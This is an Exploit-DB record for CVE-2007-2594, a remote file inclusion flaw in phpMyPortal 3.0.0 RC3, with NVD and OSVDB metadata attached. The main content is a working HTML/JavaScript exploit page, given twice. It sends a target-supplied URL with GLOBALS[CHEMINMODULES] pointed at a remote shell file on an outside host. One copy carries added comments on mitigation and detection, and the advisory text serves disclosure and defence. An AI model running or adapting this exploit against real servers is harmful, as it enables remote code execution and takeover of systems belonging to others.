ID EDB-ID:3879
Type exploitdb
Reporter GoLd_M
Modified 2007-05-09T00:00:00
Description
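phpMyPortal 3.0.0 RC3 GLOBALS[CHEMINMODULES] remote file inclusion (RFI) exploit. CVE-2007-2594. Webapps exploit for the PHP platform. Per the OSVDB:35908 entry, the flaw is only present when PHP's register_globals option is set to 'on'.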
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title>
<script language="JavaScript">
//'===============================================================================================
//'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007)
//'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell
//'[Author : Mahmood_ali
//'[S.Page : http://phpmyportal.info/menu.php <= Click Téléchargez phpMyPortal
//'[$$ : Free
//'===============================================================================================
//'[[V.Code]]------------------------------------------------------
//'
//'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');
//'
//'[[V.Code]]---------------------------------------------------------
//# Tryag.Com
//# ...
//Basic exploit,but any time : (
// Request components that command() below concatenates onto the target URL.
// Together they name the script and parameter that reach the sink quoted in
// the header comment of this file:
//   require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');
// The include prefix comes from a request-controllable variable. The
// OSVDB:35908 entry states this is only possible with register_globals on.
// Mitigation: keep register_globals and allow_url_include off, and build
// include paths from a fixed constant rather than from a global a request can set.
var path="/inc/" // directory of the vulnerable script, relative to the install path
var adres="/articles.inc.php?" // vulnerable file name plus the query-string separator
var acik ="GLOBALS[CHEMINMODULES]=" // parameter that overrides the include prefix; author's note "Line 67" presumably refers to the require_once line in articles.inc.php (not verifiable from this file)
var shell="http://www.spy-art.com/xx.txt?" // remote payload URL (author's label: "Shell Tryag-Team"); the trailing "?" turns the suffix the application appends into a query string, so appending a fixed suffix does not prevent the inclusion
// Handler wired to the "rfi" form: points the form's action at the vulnerable
// script on the entered target and submits the form.
// Returns false (after an alert) when the target field is empty; otherwise
// falls through without an explicit return value.
// Detection note: the form is declared with method="post", but the include
// parameter sits in the action URL's query string, so it is part of the
// request URL rather than the POST body. As concatenated here, the request
// path contains "/inc//articles.inc.php" (double slash) and carries a
// GLOBALS[CHEMINMODULES] value that starts with "http://".
function command(){
if (document.rfi.target1.value==""){ // no target entered
alert("Failed..");
return false;
}
rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready: target + "/inc/" + "/articles.inc.php?" + parameter name + payload URL
rfi.submit(); // Form Submit
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Arial" size="2" color="#FFFFFF">phpMyPortal 3.0.0
RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Tahoma">
</font><font color="#FF0000" size="2"> </font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<b><font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5" color="#FFFFFF">Tryag.-Team</font></a></b></p>
</p>
</center>
</body>
</html>
# milw0rm.com [2007-05-09]
{"id": "EDB-ID:3879", "hash": "2f912aab0fea2fb9469998701a8fabf2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "phpMyPortal 3.0.0 RC3 - GLOBALSCHEMINMODULES RFI Exploit", "description": "phpMyPortal 3.0.0 RC3 GLOBALS[CHEMINMODULES] RFI Exploit. CVE-2007-2594. Webapps exploit for php platform", "published": "2007-05-09T00:00:00", "modified": "2007-05-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3879/", "reporter": "GoLd_M", "references": [], "cvelist": ["CVE-2007-2594"], "lastseen": "2016-01-31T19:31:06", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2594"]}, {"type": "osvdb", "idList": ["OSVDB:35908"]}], "modified": "2016-01-31T19:31:06"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3879/", "sourceData": "<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\n<title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title>\n\n<script language=\"JavaScript\">\n \n//'===============================================================================================\n//'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007)\n//'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell\n//'[Author : Mahmood_ali\n//'[S.Page : http://phpmyportal.info/menu.php <= Click T.l.chargez phpMyPortal\n//'[$$ : Free\n//'===============================================================================================\n\n//'[[V.Code]]------------------------------------------------------\n//'\n//'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');\n//'\n//'[[V.Code]]---------------------------------------------------------\n\n//# Tryag.Com\n//# ...\n\n \n\n //Basic exploit,but any time : ( \n var 
path=\"/inc/\"\n var adres=\"/articles.inc.php?\" //File name\n var acik =\"GLOBALS[CHEMINMODULES]=\" // Line 67\n var shell=\"http://www.spy-art.com/xx.txt?\" // Shell Tryag-Team\n \n function command(){\n if (document.rfi.target1.value==\"\"){\n alert(\"Failed..\");\n return false;\n }\n\n\n \n rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready \n rfi.submit(); // Form Submit\n }\n</script>\n\n</head>\n\n<body bgcolor=\"#000000\">\n<center>\n\n<p><b><font face=\"Arial\" size=\"2\" color=\"#FFFFFF\">phpMyPortal 3.0.0 \nRC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font></b></p>\n\n<p></p>\n<form method=\"post\" target=\"getting\" name=\"rfi\" onSubmit=\"command();\">\n <b><font face=\"Tahoma\" size=\"1\" color=\"#FF0000\">Target:</font><font face=\"Tahoma\" size=\"1\" color=\"#FFFF00\">[http://[target]/[scriptpath]</font><font color=\"#00FF00\" size=\"2\" face=\"Tahoma\">\n </font><font color=\"#FF0000\" size=\"2\"> </font></b>\n <input type=\"text\" name=\"target1\" size=\"20\" style=\"background-color: #808000\" onmouseover=\"javascript:this.style.background='#808080';\" onmouseout=\"javascript:this.style.background='#808000';\"></p>\n <p><input type=\"submit\" value=\"Gonder\" name=\"B1\"><input type=\"reset\" value=\"Sifirla\" name=\"B2\"></p>\n</form>\n<p><br>\n<iframe name=\"getting\" height=\"337\" width=\"633\" scrolling=\"yes\" frameborder=\"0\"></iframe>\n</p>\n\n<b><font face=\"Lucida Handwriting\" size=\"5\" color=\"#FF0000\">Mahmood_ali</font></b><p>\n<b><a href=\"http://tryag.com/cc\">\n<font face=\"Lucida Handwriting\" size=\"5\" color=\"#FFFFFF\">Tryag.-Team</font></a></b></p>\n</p>\n</center>\n</body>\n\n</html>\n\n# milw0rm.com [2007-05-09]\n", "osvdbidlist": ["35908"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-11T11:07:09", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in inc/articles.inc.php in phpMyPortal 3.0.0 RC3 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[CHEMINMODULES] parameter.", "modified": "2017-10-10T21:32:17", "published": "2007-05-11T06:19:00", "id": "CVE-2007-2594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2594", "title": "CVE-2007-2594", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\n[Secunia Advisory ID:25210](https://secuniaresearch.flexerasoftware.com/advisories/25210/)\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3879\nFrSIRT Advisory: ADV-2007-1738\n[CVE-2007-2594](https://vulners.com/cve/CVE-2007-2594)\nBugtraq ID: 23898\n", "modified": "2007-05-09T08:29:04", "published": "2007-05-09T08:29:04", "href": "https://vulners.com/osvdb/OSVDB:35908", "id": "OSVDB:35908", "title": "phpMyPortal inc/articles.inc.php GLOBALS[CHEMINMODULES] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}